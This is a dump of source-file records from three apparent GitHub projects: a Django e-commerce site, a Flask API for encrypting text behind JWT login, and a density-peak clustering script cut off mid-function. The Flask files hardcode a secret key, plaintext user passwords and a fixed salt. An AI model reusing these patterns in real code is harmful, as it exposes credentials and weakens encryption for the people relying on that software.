"blob_id": "4624d9ae8de03ae4bc98e2bcae26d3d02ebf8ce0",
"content_id": "233daa622e602cb0efac4fc88d5081583aaf37ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 4104,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 138,
"path": "/mahedi/shop/templates/shop/user_register.html",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "{% extends 'shop/basic.html' %}\n\n{% block title%} About Us{% endblock %}\n{% block body %}\n\n\n\n{% load static %}\n{% load crispy_forms_tags %}\n\n\n\n<div class=\"breadcrumb-area\">\n <div class=\"container\">\n <div class=\"breadcrumb-content\">\n <ul>\n \n <li class=\"active\">Register</li>\n </ul>\n </div>\n <div>\n {%if messages %} {% for message in messages %}\n <div class=\"alert alert-{{ message.tags }}\" role=\"alert\">\n {{message}}\n </div>\n {% endfor %} {% endif %}\n </div>\n </div>\n</div>\n<!-- Li's Breadcrumb Area End Here -->\n<!-- Begin Login Content Area -->\n<div class=\"page-section mb-60\">\n <div class=\"container\">\n <div class=\"row\">\n \n <div class=\"col-sm-12 col-md-12 col-lg-6 col-xs-12\">\n <form method=\"post\">\n {% csrf_token %}\n <div class=\"login-form\">\n <h4 class=\"login-title\">Register</h4>\n <div class=\"row\">\n <div class=\"col-md-12 mb-20\">\n {{ form.username|as_crispy_field }}\n </div>\n <div class=\"col-md-6 col-12 mb-20\">\n {{ form.first_name|as_crispy_field }}\n </div>\n <div class=\"col-md-6 col-12 mb-20\">\n {{ form.last_name|as_crispy_field }}\n </div>\n <div class=\"col-md-12 mb-20\">\n {{ form.email|as_crispy_field }}\n </div>\n \n <div class=\"col-md-6 mb-20\">\n {{ form.password1|as_crispy_field }}\n </div>\n <div class=\"col-md-6 mb-20\">\n {{ form.password2|as_crispy_field }}\n </div>\n \n <div class=\"col-12\">\n <button class=\"register-button mt-0\">Register</button>\n </div>\n </div>\n </div>\n </form>\n </div>\n </div>\n </div>\n</div>\n\n\n\n<footer class=\"page-footer font-small cyan darken-3\" style=\" background-color: #000000!important;\">\n \n <!-- Footer Elements -->\n <div class=\"container\">\n\n <!-- Grid row-->\n <div class=\"row\">\n\n <!-- Grid column -->\n <div class=\"col-md-12 py-5\">\n <div class=\"mb-5 flex-center\">\n\n <!-- Facebook -->\n <a class=\"fb-ic text-light\">\n <i class=\"fab fa-facebook-f fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!-- Twitter -->\n <a class=\"tw-ic text-light\">\n <i class=\"fab fa-twitter fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!-- Google +-->\n <a class=\"gplus-ic text-light\">\n <i class=\"fab fa-google-plus-g fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!--Linkedin -->\n <a class=\"li-ic text-light\">\n <i class=\"fab fa-linkedin-in fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n <!--Instagram-->\n <a class=\"ins-ic text-light\">\n <i class=\"fab fa-instagram fa-lg white-text mr-md-5 mr-3 fa-2x\"> </i>\n </a>\n \n <a class=\"navbar-brand\" href=\"#!\">\n <img src=\"{{setting.icon.url}}\" height=\"70\" width=\"250\" alt=\"mdb logo\">\n </a>\n </div>\n\n </div>\n <!-- Grid column -->\n\n </div>\n\n <!-- Grid row-->\n\n\n </div>\n <hr class=\"w-100 mt-2 \" style=\"background-color: #ffbf00!important;\">\n <!-- Footer Elements -->\n\n <!-- Copyright -->\n <div class=\"footer-copyright text-center py-3 text-light\">© 2020 Copyright:\n <a href=\"\" class=\" text-muted\"> [email protected]</a>\n </div>\n <!-- Copyright -->\n\n</footer>\n\n\n\n\n\n\n{% endblock %}"
},
{
"alpha_fraction": 0.6840909123420715,
"alphanum_fraction": 0.706818163394928,
"avg_line_length": 30.428571701049805,
"blob_id": "acf92a5887ce20554e3a524f50938d2d4644f231",
"content_id": "94be81ce902a2dded8e9d11b56c32b3e9f842da7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 14,
"path": "/mahedi/blog/models.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\n# Create your models here.\nclass Blogpost(models.Model):\n post_id=models.AutoField(primary_key=True)\n title=models.CharField(max_length=200)\n author=models.CharField(max_length=500,default=\"\")\n blog=models.CharField(max_length=9000,default=\"\")\n pub_date=models.DateField()\n thumbnail = models.ImageField(upload_to='shop/images', default=\"\")\n\n def __str__(self):\n return self.title\n"
},
{
"alpha_fraction": 0.7108238935470581,
"alphanum_fraction": 0.7156704068183899,
"avg_line_length": 25.95652198791504,
"blob_id": "00eee53e05f66989de60d1be070ffaaa4e08980e",
"content_id": "00215869de0fee75a8d687c9e6e824a5cf403532",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 23,
"path": "/mahedi/blog/views.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Blogpost\nfrom shop.models import ProjectSetting\n# Create your views here.\nfrom django.http import HttpResponse\n\ndef index(request):\n myposts = Blogpost.objects.all()\n setting = ProjectSetting.objects.get(id=1)\n params={\n 'myposts':myposts,\n 'setting':setting,\n }\n return render(request, 'blog/index.html',params)\n\ndef blogpost(request, id):\n\tpost = Blogpost.objects.filter(post_id = id)[0]\n\tsetting = ProjectSetting.objects.get(id=1)\n\tparams={\n 'post':post,\n 'setting':setting,\n }\n\treturn render(request, 'blog/blogpost.html',params)"
},
{
"alpha_fraction": 0.6193330883979797,
"alphanum_fraction": 0.6242038011550903,
"avg_line_length": 37.128570556640625,
"blob_id": "eb6f56b06a91c3ac5a2ed61cea2fbb8321f6167f",
"content_id": "3558b9f135f5825cdc47c5e9014a5762b8c57dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2669,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 70,
"path": "/mahedi/shop/forms.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm,UserChangeForm\nfrom django.forms import ModelForm, TextInput, NumberInput, EmailInput, PasswordInput, Select, FileInput\nfrom .models import UserProfile\nfrom django.forms import ModelForm\n\n\n\nclass SignupForm(UserCreationForm):\n username=forms.CharField(max_length=50, label=\"username\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your username\",}\n ))\n email=forms.EmailField(max_length=200, label=\"email\",widget=forms.EmailInput(\n attrs={'placeholder':\"Write your email\",}\n ))\n first_name=forms.CharField(max_length=30, label=\"first name\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your first name\",}\n ))\n last_name=forms.CharField(max_length=30, label=\"last name\",widget=forms.TextInput(\n attrs={'placeholder':\"Write your last name\",}\n ))\n \n \n \n class Meta:\n model=User\n fields=['username','email','first_name','last_name','password1','password2',]\n widgets={\n 'password1':forms.PasswordInput(attrs={'class':'form-control','placeholder':'Enter a new Password'}),\n 'password2':forms.PasswordInput(attrs={'class':'form-control','placeholder':'Confirm your Password'}),\n \n\n }\n\n\nclass UserUpdateForm(UserChangeForm):\n class Meta:\n model=User\n fields=('username','email','first_name','last_name')\n widgets={\n 'username':TextInput(attrs={'class':'input','placeholder':'username'}),\n 'email':EmailInput(attrs={'class':'input','placeholder':'email'}),\n 'first_name':TextInput(attrs={'class':'input','placeholder':'first_name'}),\n 'last_name':TextInput(attrs={'class':'input','placeholder':'last_name'}),\n }\n\n\nCITY = [\n ('Dhaka', 'Dhaka'),\n ('Mymensign', 'Mymensign'),\n ('Rajshahi', 'Rajshahi'),\n ('Rangpur', 'Rangpur'),\n ('Barisal', 'Barisal'),\n ('Chottogram', 'Chottogram'),\n ('Khulna', 'Khulna'),\n]\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('phone', 'address', 'city', 'country', 'image')\n widgets = {\n 'phone': TextInput(attrs={'class': 'input', 'placeholder': 'phone'}),\n 'address': TextInput(attrs={'class': 'input', 'placeholder': 'address'}),\n 'city': Select(attrs={'class': 'input', 'placeholder': 'city'}, choices=CITY),\n 'country': TextInput(attrs={'class': 'input', 'placeholder': 'country'}),\n 'image': FileInput(attrs={'class': 'input', 'placeholder': 'image', }),\n }\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 32,
"blob_id": "d9747d86c40114dbe2d4522604e4fb36e5c34ceb",
"content_id": "f26aa7ece5cbbf53e99022350515a3ae75c1f9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 14,
"path": "/mahedi/shop/admin.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Product, Contact, Order, OrderUpdate,ProjectSetting,UserProfile\nadmin.site.register(Product)\nadmin.site.register(Contact)\nadmin.site.register(Order)\nadmin.site.register(OrderUpdate)\nadmin.site.register(ProjectSetting)\nclass UserProfileAdmin(admin.ModelAdmin):\n\tlist_display=['user','country','image_tag']\n\tlist_filter=['user',]\n\nadmin.site.register(UserProfile,UserProfileAdmin)\n"
},
{
"alpha_fraction": 0.6710615754127502,
"alphanum_fraction": 0.6944760084152222,
"avg_line_length": 34.39516067504883,
"blob_id": "67cd47bc7bc65794a6652b1706049ba9e22c7fa1",
"content_id": "849e2ddf1409a1d2636dd055d74537daa6015cbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4399,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 124,
"path": "/mahedi/shop/models.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\n\n# Create your models here.\nclass ProjectSetting(models.Model):\n STATUS = (\n ('True', 'True'),\n ('False', 'False'),)\n \n title =models.CharField(max_length=200)\n keyword=models.CharField(max_length=200)\n description=models.TextField()\n address=models.CharField(max_length=200)\n phone=models.CharField(max_length=18)\n fax=models.CharField(blank=True,max_length=50)\n email=models.EmailField(blank=True,null=True,max_length=100)\n smptserver=models.CharField(max_length=100)\n smptemail=models.EmailField(blank=True,null=True,max_length=100)\n smptpassword=models.CharField(blank=True,max_length=50)\n smptport=models.CharField(blank=True,max_length=150)\n icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n about_icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n title_icon=models.ImageField(blank=True,null=True,upload_to='icon/')\n facebook=models.CharField(blank=True,max_length=100)\n instagram=models.CharField(blank=True,max_length=100)\n address=models.TextField()\n contact=models.TextField()\n reference=models.TextField()\n status=models.CharField(max_length=50,choices=STATUS)\n created_at=models.DateTimeField(auto_now_add=True)\n updated_at=models.DateTimeField(auto_now_add=True)\n team1=models.ImageField(blank=True,null=True,upload_to='icon/')\n team2=models.ImageField(blank=True,null=True,upload_to='icon/')\n team3=models.ImageField(blank=True,null=True,upload_to='icon/')\n team4=models.ImageField(blank=True,null=True,upload_to='icon/')\n team5=models.ImageField(blank=True,null=True,upload_to='icon/')\n user=models.ImageField(blank=True,null=True,upload_to='icon/')\n\n\n def __str__(self):\n return self.title\n \nclass Product(models.Model):\n product_id = models.AutoField\n product_name = models.CharField(max_length=50)\n category = models.CharField(max_length=50, default=\"\")\n subcategory = models.CharField(max_length=50, default=\"\")\n price = models.IntegerField(default=0)\n desc = models.CharField(max_length=300)\n pub_date = models.DateField()\n image = models.ImageField(upload_to='shop/images', default=\"\")\n\n def __str__(self):\n return self.product_name\n\n\nclass Contact(models.Model):\n msg_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n email = models.CharField(max_length=70, default=\"\")\n phone = models.CharField(max_length=70, default=\"\")\n desc = models.CharField(max_length=500, default=\"\")\n\n\n def __str__(self):\n return self.name\n\nclass Order(models.Model):\n order_id = models.AutoField(primary_key=True)\n items_json = models.CharField(max_length=5000)\n amount = models.IntegerField(default=0)\n name = models.CharField(max_length=90)\n email = models.CharField(max_length=111)\n address = models.CharField(max_length=111)\n city = models.CharField(max_length=111)\n state = models.CharField(max_length=111)\n zip_code = models.CharField(max_length=111)\n phone = models.CharField(max_length=111, default=\"\")\n\n\n def __str__(self):\n return self.name+\"\\'s Product\"\n\n\n\n\n\nclass OrderUpdate(models.Model):\n update_id=models.AutoField(primary_key=True)\n order_id=models.IntegerField(default=\"\")\n update_desc=models.CharField(max_length=5000)\n timesetup=models.DateField(auto_now_add=True)\n\n def __str__(self):\n return self.update_desc[0:7] + \"...\"\n\n\n\n\nclass UserProfile(models.Model):\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n 
phone=models.CharField(blank=True,max_length=20)\n address=models.CharField(blank=True,max_length=250)\n city=models.CharField(blank=True,max_length=25)\n country=models.CharField(blank=True,max_length=30)\n image=models.ImageField(blank=True,upload_to='user_img')\n\n def __str__(self):\n return self.user.username\n\n\n def user_name(self):\n return self.user.first_name+' '+ self.user.last_name+'['+self.user.username+']'\n\n def image_tag(self):\n return mark_safe('<img src=\"{}\" heights=\"50\" width=\"50\" />'.format(self.image.url))\n image_tag.short_description='Image'\n\n def imageUrl(self):\n if self.image:\n return self.image.url\n else:\n return \"\"\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5085158348083496,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 21.83333396911621,
"blob_id": "46ab59b14653155675f9fc7327f87073f31f774c",
"content_id": "20a3603d4b231344c0b5935ca6e06da4e1844cf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 18,
"path": "/mahedi/blog/migrations/0004_blogpost_types.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-16 06:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0003_auto_20201216_1204'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='blogpost',\n name='types',\n field=models.CharField(default='', editable=False, max_length=200),\n ),\n ]\n"
}
] | 10 |
dunefro/raelvaes | https://github.com/dunefro/raelvaes | ae618d580ae67bd231386294d3f181803759caa5 | 6276818e47e345dceed4dd00eb72b55304920e99 | 2639b4946dce7beb5e832b3baa2941c1d6cc6301 | refs/heads/master | 2023-01-29T23:45:12.129173 | 2020-12-10T16:56:35 | 2020-12-10T16:56:35 | 299,208,332 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7779783606529236,
"alphanum_fraction": 0.7888086438179016,
"avg_line_length": 29.83333396911621,
"blob_id": "76207b9e4751f1e502f3089f258e63b718cecf33",
"content_id": "5bcf975a0de6233cc285ae401360a399110dda74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/flask_app/app/v1/__init__.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask import Flask , request\nfrom flask_restful import Resource, Api , reqparse\nfrom flask_jwt import JWT , jwt_required , current_identity\nimport os\nimport base64\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\n\napp = Flask(__name__)\n# The secret key is to be initialized before the api object is created\napp.secret_key = 'aR4QpGzGgHcY7haxHT9g89Puph3NgvNBBMBMnHEC'\napi = Api(app)\nsalt = b'6o\\x96h`\\xdf\\xf1\\xecL2`\\xcf=\\xf0`\\xcc'\n\nfrom app.v1 import access\nfrom app.v1 import health"
},
{
"alpha_fraction": 0.7392995953559875,
"alphanum_fraction": 0.7548637986183167,
"avg_line_length": 20.5,
"blob_id": "76662058d340de7b566d3f4ec39f7316b5e5ad17",
"content_id": "f2f096ab81b861a51c2767f31687bf722605af5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 12,
"path": "/flask_app/execute.sh",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ -z $VIRTUAL_ENV ]\nthen\n echo \"Activating Python Virtual Environment\"\n source myenv/bin/activate\nfi\nexport FLASK_APP=run.py\nexport FLASK_ENV=development\nexport PYTHONPATH=/home/ubuntu/workspace/raelvaes/flask_app\n\nflask run -h 0.0.0.0"
},
{
"alpha_fraction": 0.715855598449707,
"alphanum_fraction": 0.720565140247345,
"avg_line_length": 78.625,
"blob_id": "1f2f034a1f42b6c1abff1ab9d3d4d140b03a0ced",
"content_id": "9433cb3dc9fe5666b316751f5013857941d7ae8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 8,
"path": "/Roadmap.md",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "- [ ] Deploy a simple application like kafka (ver 0.0.1)\n - [ ] Flask API accepting json input to process for execution\n - [ ] Sample structure of json/yaml\n - [ ] The sample structure should be somewhat similar to docker-compose or kubernetes yaml, apiVersion should refer to the version of api we are using in flask\n - [ ] terminology is based on railways\n - [ ] Depending upon the input a simple algorithm that calculates the resources (AWS) that will be required.\n - [ ] Templatising the algorithm result into terraform and ansible modules\n - [ ] Executing the terraform module and ansible module as well.\n"
},
{
"alpha_fraction": 0.6000881791114807,
"alphanum_fraction": 0.6221340298652649,
"avg_line_length": 33.907691955566406,
"blob_id": "260afce61c3f37860173914c5700157156940303",
"content_id": "aec51ed0ad3ae54ac4669550ffbb10149e22d977",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2268,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 65,
"path": "/flask_app/app/v1/access.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1 import app , api , Resource , JWT , jwt_required , reqparse , request , current_identity , os , base64 , Fernet , hashes , PBKDF2HMAC , salt\nfrom app.v1.security.auth import authenticate , identity\n\njwt = JWT(app , authenticate , identity)\n\nclass Access(Resource):\n\n @staticmethod\n def decrypt_text(text):\n\n password = current_identity.password.encode()\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256() , length=32 , salt=salt , iterations=100000)\n key = base64.urlsafe_b64encode(kdf.derive(password))\n f = Fernet(key)\n return f.decrypt(text.encode()).decode()\n\n @jwt_required() \n def post(self,name):\n \"\"\"This function takes the GET req on /access API. \n Used for accessing the VM/cloud over which the authentication will take place either to connect via SSH or deploy VMs. \n\n Args:\n name ([string]): [kind of authentication. Allowed values are (ssh,aws,gcp,azure,k8s)]\n\n Returns:\n [dictionary]: [Will return successful if the authentication works fine.]\n \"\"\"\n if request.is_json:\n data = request.get_json()\n else:\n return {'Message': 'Request Body type is not json'},400\n decrypted_text = Access.decrypt_text(data['key'])\n print(decrypted_text)\n return decrypted_text,200\n\nclass SecureText(Resource):\n\n @staticmethod\n def encrypt_text(text):\n password = current_identity.password.encode()\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256() , length=32 , salt=salt , iterations=100000)\n key = base64.urlsafe_b64encode(kdf.derive(password))\n f = Fernet(key)\n return f.encrypt(text.encode()).decode()\n\n @jwt_required()\n def get(self,text):\n \"\"\"Function returns the encrypted text.\n\n Args:\n name ([string]): [text that is to be encrypted]\n\n Returns:\n [string]: [The encrypted string/token]\n \"\"\"\n try:\n encrypted_text = SecureText.encrypt_text(text)\n return {'encrypted': encrypted_text},200\n except:\n return {'Message': 'Your text [{}] can\\'t be encrypted'.format(text)} , 500\n\n\n\napi.add_resource(Access,'/access/<string:name>')\napi.add_resource(SecureText,'/securetext/<string:text>')"
},
{
"alpha_fraction": 0.6877265572547913,
"alphanum_fraction": 0.697566032409668,
"avg_line_length": 36.13461685180664,
"blob_id": "32ba4e5c10860815074f2fd3fa20bdda4020af67",
"content_id": "0db305ca5e24efe721fa62011abed2851691aace",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1931,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 52,
"path": "/README.md",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "# raelvaes\n1. Authentication with the API itself -> Correct Username and Password\n2. /access/<string:cloud-provider-name> -> to authenticate with cloud provider AWS, Azure or using SSH/k8s\n3. /execute/platform -> Platform\n4. /execute/station -> \n5. /journey/start\n\n\n# New Implementation\n1. access.yaml hits the flask API and `Access` object is created.\n a. `Access` class receives the complete details and tests the connection (ssh for now).\n b. Creates an object with the same name as of the name in the metadata.\n2. After this `Platform_flask` API gets the `Platform` object\n a. `Platform` class creates an object.\n b. object looks for `Access` information\n c. If `Access` information is present, perform the connection and use ansible module\n d. If `Access` information is not present, pass the `Platform` object to server decider\n e. After server decider pass the information to terraform\n f. Terraform creates the required resources.\n g. Ansible module deploys the required software.\n \n\n\n\n\nNotes :\n1. First an authentication to the API with the username and the password\n2. Securing authentication to the VM, either SSH or AWS or k8s(for now)\n3. Executing platform is preparing a VM for task deployments by creating a new machine from cloud access keys. Nothing is to be done when platform is to be SSHed.\n4. A station can have multiple platforms, platforms are VMs, so station is nothing but a bunch of VM that you wish to pack together in a group.\n5. The journey will begin from start( for e.g. Station 1) till end (for e.g. Station 5).\n\n\n# Mechanism to connect using SSH\n1. Using username and password\n2. Key based \n```\n## 1. Username\n\n POST /access/ssh\n {\n \"type\": \"user-based\"\n \"username\": \"ubuntu\"\n \"password\" : {\n \"type\": \"secure\"\n \"hash\": _________\n }\n \"password\": \"\n }\n ```\n # Architecture\n \n"
},
{
"alpha_fraction": 0.5959596037864685,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 19,
"blob_id": "9b1a07719323a1ab6427c21a170cc4105ab4bfaa",
"content_id": "57906a8f12a5860ac62dc6396a57559dbb44582c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 5,
"path": "/flask_app/app/v1/health.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1 import app \n\[email protected]('/healthz')\ndef health():\n return 'Up and Running !!!' , 200"
},
{
"alpha_fraction": 0.672583818435669,
"alphanum_fraction": 0.6844181418418884,
"avg_line_length": 25.736841201782227,
"blob_id": "e367e0df9203fb34d4cb141816e00f1d1947cbba",
"content_id": "33430063c96ed8e9f29d7714316b88e48f48b939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 507,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/flask_app/app/v1/security/auth.py",
"repo_name": "dunefro/raelvaes",
"src_encoding": "UTF-8",
"text": "from app.v1.security.user import User\nusers = [\n User(1,'admin','LsadR3syRYtwVHH'),\n User(2,'developer','hAhGYeN4Ysz6wZC')\n]\n\nusername_mapping = { user.username: user for user in users }\nuserid_mapping = { user.id: user for user in users }\n\ndef authenticate( username , password ):\n\n user = username_mapping.get( username , None)\n if user and user.password == password:\n return user\n\ndef identity(payload):\n\n user_id = payload['identity']\n return userid_mapping.get( user_id , None)"
}
] | 7 |
yiwangchunyu/AdvancedCDP | https://github.com/yiwangchunyu/AdvancedCDP | 412c417134799eed6fb6119fead9209c525d7f46 | 0197c002755b384a402a1cf002eecded4f05e5ba | 088bb68dd3c1385dafc94a308965a890e4829bf6 | refs/heads/master | 2021-04-17T22:54:40.679439 | 2020-05-14T16:04:21 | 2020-05-14T16:04:21 | 249,482,720 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5288001894950867,
"alphanum_fraction": 0.5464911460876465,
"avg_line_length": 33.272987365722656,
"blob_id": "05c0f97ffacc6f3ca0d2e0454f2191c3fe589314",
"content_id": "bb2283eccaab94b846eef6e3598243a340a58665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12027,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 348,
"path": "/AdvancedCDP.py",
"repo_name": "yiwangchunyu/AdvancedCDP",
"src_encoding": "UTF-8",
"text": "import heapq\nimport time\nfrom math import exp\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom typing import List\n\nfrom tqdm import tqdm\n\nEPS=40 #邻域半径\nP=2\n\nMAX_DELTA=1e10\nDISPLAY_SCATTER_SIZE=150\nDIS_INF=1e10\n\nclass Point():\n\n def __init__(self,id,x):\n self.id=id\n self.x=x\n self.label_real=-1\n self.label=-1\n self.cost = DIS_INF # 距离源S的距离\n self.edge_all = {} # 边的情况\n self.edge_eps = {} # 边的情况\n self.density = 0\n self.delta = MAX_DELTA\n self.gamma = None\n self.pre=None\n self.pre_size=0\n self.cost_sum=0\n\n\n def comput_euclidean_dis_with(self,point_y):\n norm_2 = np.linalg.norm(np.array(self.x) - np.array(point_y.x), ord=2)\n return norm_2\n\n def __lt__(self, other):\n return self.cost < other.cost\n\n\ndef scatter2D(pts,title=''):\n x=[p.x[0] for p in pts]\n y=[p.x[1] for p in pts]\n labels=[p.label for p in pts]\n plt.title(title)\n plt.scatter(x, y, s=10, c=labels, marker='o')\n plt.savefig('scatter2D.png', dpi=500)\n plt.show()\n\n\ndef dataset(data_file, label_file, display:bool=True):\n id2point={}\n pts=[]\n dataf=open(data_file,'r')\n labelf = open(label_file, 'r')\n for line in dataf:\n if line[:2]=='//':\n continue\n id=line.split('\\t')[0]\n pos=tuple(map(float,line.split('\\t')[1:]))\n point=Point(id,pos)\n pts.append(point)\n id2point[id]=point\n\n for line in labelf:\n if line[:2]=='//':\n continue\n id = line.split('\\t')[0]\n label=int(line.split('\\t')[-1])\n id2point[id].label_real=label\n\n if display:\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label_real for p in pts]\n plt.title('')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.axis('scaled')\n plt.savefig('scatter2D.png', dpi=500)\n plt.show()\n return id2point,pts\n\ndef find_edge(pts:List[Point]):\n print('find edge...')\n for point in tqdm(pts):\n for neighbor_point in pts:\n if point.id==neighbor_point.id:\n continue\n dis=point.comput_euclidean_dis_with(neighbor_point)\n point.edge_all[neighbor_point.id]=dis\n if dis<EPS:\n point.edge_eps[neighbor_point.id]=dis\n\ndef decision_graph(pts:List[Point], display:bool=True) -> List[Point]:\n #计算每个点的密度\n print('computing density...')\n for point in tqdm(pts):\n for id in point.edge_eps:\n point.density+=exp(-(point.edge_eps[id]/EPS)**2)\n #按密度从高到低排序\n pts.sort(key=lambda p:p.density,reverse=True)\n #计算delta\n max_density=pts[0].density\n print('computing delta...')\n for id,point in tqdm(enumerate(pts)):\n if point.density==max_density:\n point.delta = -MAX_DELTA\n for point_neighbor in pts:\n if point.id==point_neighbor.id:\n continue\n dis = point.edge_all[point_neighbor.id]\n point.delta=max(point.delta,dis)\n else:\n for point_neighbor in pts[:id]:\n if point_neighbor.density>point.density:\n dis = point.edge_all[point_neighbor.id]\n point.delta=min(point.delta,dis)\n #delta归一化(max_min nomalization)\n print('nomalization...')\n max_delta=-MAX_DELTA\n min_delta=MAX_DELTA\n for point in pts:\n max_delta=max(max_delta,point.delta)\n min_delta = min(min_delta, point.delta)\n for point in pts:\n point.delta=(point.delta-min_delta)/(max_delta-min_delta)\n\n if display:\n dens = [p.density for p in pts]\n deltas = [p.delta for p in pts]\n plt.title('decision graph')\n plt.xlabel('density')\n plt.ylabel('delta')\n plt.scatter(dens, deltas, s=20, marker='o')\n plt.show()\n return pts\n\ndef find_albow(pts:List[Point], display:bool=True):\n for point in pts:\n point.gamma=point.delta*point.density\n #排序\n pts_sorted_by_gamma=sorted(pts, key=lambda point:point.gamma, 
reverse=True)\n gammas=[point.gamma for point in pts_sorted_by_gamma]\n # derivative1st = [gammas[i] - gammas[i + 1] for i in range(0, len(gammas)-1)]\n from kneed import KneeLocator\n kn = KneeLocator([i for i in range(len(gammas))], gammas, curve='convex', direction='decreasing')\n if display:\n plt.title('gamma elbow point')\n plt.xlabel('n')\n plt.ylabel('gamma')\n plt.vlines(x=kn.elbow, ymin=0,ymax=gammas[0],colors='r',linestyles = \"--\", label='elbow=%d'%(kn.elbow))\n plt.scatter([i for i in range(len(gammas))],gammas,s=20,marker='o')\n plt.scatter(kn.elbow, gammas[kn.elbow], s=30, marker='o',c='r')\n plt.legend()\n # plt.scatter([i+1 for i in range(len(derivative1st))], derivative1st, s=20, marker='o',c='r')\n plt.show()\n\n num_class=kn.elbow\n n_centre_point=pts_sorted_by_gamma[:num_class]\n n_centre_id = [point.id for point in n_centre_point]\n return n_centre_id\n\ndef clustring_CDP(n_centre_id:List[int], pts:List[Point], display:bool=True):\n label=1\n for centre_id in n_centre_id:\n id2point[centre_id].label=label\n label+=1\n\n for point in pts:\n min_dis=MAX_DELTA\n l=-1\n for centre_id in n_centre_id:\n if 